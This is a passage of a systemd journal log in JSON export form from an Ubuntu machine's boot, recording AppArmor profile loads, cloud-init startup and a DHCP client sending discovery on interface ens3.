"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=219;b=e2b08827b5804427b422c10c84f1567e;m=744f27;t=5bd16dd37ce8f;x=f9560e2a0e92290e", "__REALTIME_TIMESTAMP" : "1615280781905551", "__MONOTONIC_TIMESTAMP" : "7622439", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", 
"SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781900000", "_AUDIT_ID" : "10", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/bin/lxc-start", "_PID" : "529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21a;b=e2b08827b5804427b422c10c84f1567e;m=74556b;t=5bd16dd37d4d2;x=de42aec6db752bfc", "__REALTIME_TIMESTAMP" : "1615280781907154", "__MONOTONIC_TIMESTAMP" : "7624043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7622430", "MESSAGE" : "audit: type=1400 audit(1615280781.900:10): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/lxc-start\" pid=529 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21b;b=e2b08827b5804427b422c10c84f1567e;m=758c7e;t=5bd16dd390be5;x=f4d167c850b5d58b", "__REALTIME_TIMESTAMP" : "1615280781986789", "__MONOTONIC_TIMESTAMP" : "7703678", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_AUDIT_ID" : "11", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : 
"/usr/bin/man", "_PID" : "531" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21c;b=e2b08827b5804427b422c10c84f1567e;m=758ee1;t=5bd16dd390e49;x=e5b217df70efe210", "__REALTIME_TIMESTAMP" : "1615280781987401", "__MONOTONIC_TIMESTAMP" : "7704289", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781980000", "_PID" : "531", "_AUDIT_ID" : "12", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_filter\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_filter" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21d;b=e2b08827b5804427b422c10c84f1567e;m=758f5a;t=5bd16dd390ec1;x=c0bbeffe5de99bf7", "__REALTIME_TIMESTAMP" : "1615280781987521", "__MONOTONIC_TIMESTAMP" : "7704410", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7703647", "MESSAGE" : "audit: type=1400 audit(1615280781.980:11): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/bin/man\" pid=531 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21e;b=e2b08827b5804427b422c10c84f1567e;m=75915f;t=5bd16dd3910c6;x=28684cc8d8a1497c", "__REALTIME_TIMESTAMP" : "1615280781988038", "__MONOTONIC_TIMESTAMP" : "7704927", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", 
"SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_PID" : "531", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781984000", "_AUDIT_ID" : "13", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_groff\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_groff" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21f;b=e2b08827b5804427b422c10c84f1567e;m=78f2b1;t=5bd16dd3c7217;x=862c7cd4f0fc5f39", "__REALTIME_TIMESTAMP" : "1615280782209559", "__MONOTONIC_TIMESTAMP" : "7926449", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782204000", "_AUDIT_ID" : "14", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine", "_PID" : "533" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=220;b=e2b08827b5804427b422c10c84f1567e;m=78f44a;t=5bd16dd3c73b1;x=add7f7ace0088a9f", "__REALTIME_TIMESTAMP" : "1615280782209969", "__MONOTONIC_TIMESTAMP" : "7926858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" 
: "1615280782204000", "_PID" : "533", "_AUDIT_ID" : "15", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine//mount-namespace-capture-helper\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=221;b=e2b08827b5804427b422c10c84f1567e;m=78fe7c;t=5bd16dd3c7de3;x=d41d5ce55364f408", "__REALTIME_TIMESTAMP" : "1615280782212579", "__MONOTONIC_TIMESTAMP" : "7929468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=222;b=e2b08827b5804427b422c10c84f1567e;m=7aa48e;t=5bd16dd3e23f5;x=98aabf09c000db31", "__REALTIME_TIMESTAMP" : "1615280782320629", "__MONOTONIC_TIMESTAMP" : "8037518", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782316000", "_AUDIT_ID" : "16", "MESSAGE" 
: "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/sbin/tcpdump\" pid=537 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/sbin/tcpdump", "_PID" : "537" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=223;b=e2b08827b5804427b422c10c84f1567e;m=7aa887;t=5bd16dd3e27ee;x=2a93c48fc7221991", "__REALTIME_TIMESTAMP" : "1615280782321646", "__MONOTONIC_TIMESTAMP" : "8038535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : " ...done." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=224;b=e2b08827b5804427b422c10c84f1567e;m=7ab6b5;t=5bd16dd3e361d;x=1364507ad89130f1", "__REALTIME_TIMESTAMP" : "1615280782325277", "__MONOTONIC_TIMESTAMP" : "8042165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Started AppArmor initialization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782322885" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=225;b=e2b08827b5804427b422c10c84f1567e;m=7abd1b;t=5bd16dd3e3c82;x=2b59fb9d444212bb", "__REALTIME_TIMESTAMP" : "1615280782326914", "__MONOTONIC_TIMESTAMP" : "8043803", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", 
"_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Initial cloud-init job (pre-networking)...", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782326905" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=226;b=e2b08827b5804427b422c10c84f1567e;m=9dfc2c;t=5bd16dd617b93;x=b24e6efe5fdec21", "__REALTIME_TIMESTAMP" : "1615280784636819", "__MONOTONIC_TIMESTAMP" : "10353708", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "MESSAGE" : "Internet Systems Consortium DHCP Client 4.3.5", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784636742" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=227;b=e2b08827b5804427b422c10c84f1567e;m=9e04cd;t=5bd16dd618434;x=bc3c60b7fa04cd28", "__REALTIME_TIMESTAMP" : "1615280784639028", "__MONOTONIC_TIMESTAMP" : "10355917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", 
"SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Copyright 2004-2016 Internet Systems Consortium.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639018" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=228;b=e2b08827b5804427b422c10c84f1567e;m=9e05da;t=5bd16dd618541;x=b84a43eb2fa58f2e", "__REALTIME_TIMESTAMP" : "1615280784639297", "__MONOTONIC_TIMESTAMP" : "10356186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "All rights reserved.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639288" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=229;b=e2b08827b5804427b422c10c84f1567e;m=9e0677;t=5bd16dd6185de;x=d698504e74ccb48", 
"__REALTIME_TIMESTAMP" : "1615280784639454", "__MONOTONIC_TIMESTAMP" : "10356343", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "For info, please visit https://www.isc.org/software/dhcp/", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639446" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22a;b=e2b08827b5804427b422c10c84f1567e;m=9e0717;t=5bd16dd61867e;x=48ec75f5f0dd229d", "__REALTIME_TIMESTAMP" : "1615280784639614", "__MONOTONIC_TIMESTAMP" : "10356503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf 
/bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639606" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22b;b=e2b08827b5804427b422c10c84f1567e;m=9e1553;t=5bd16dd6194bb;x=bfb22e643e029b0f", "__REALTIME_TIMESTAMP" : "1615280784643259", "__MONOTONIC_TIMESTAMP" : "10360147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Listening on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643251" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22c;b=e2b08827b5804427b422c10c84f1567e;m=9e15bd;t=5bd16dd619525;x=92236d6c9cf78cdf", "__REALTIME_TIMESTAMP" : "1615280784643365", "__MONOTONIC_TIMESTAMP" : "10360253", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : 
"syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643360" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22d;b=e2b08827b5804427b422c10c84f1567e;m=9e1674;t=5bd16dd6195dc;x=b2891843f03c37b", "__REALTIME_TIMESTAMP" : "1615280784643548", "__MONOTONIC_TIMESTAMP" : "10360436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on Socket/fallback", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643541" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22e;b=e2b08827b5804427b422c10c84f1567e;m=9e1705;t=5bd16dd61966c;x=9f3edbe02215b3ff", 
"__REALTIME_TIMESTAMP" : "1615280784643692", "__MONOTONIC_TIMESTAMP" : "10360581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPDISCOVER on ens3 to 255.255.255.255 port 67 interval 3 (xid=0xf379735)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22f;b=e2b08827b5804427b422c10c84f1567e;m=9e1dfa;t=5bd16dd619d62;x=29ed3871bd0e37c0", "__REALTIME_TIMESTAMP" : "1615280784645474", "__MONOTONIC_TIMESTAMP" : 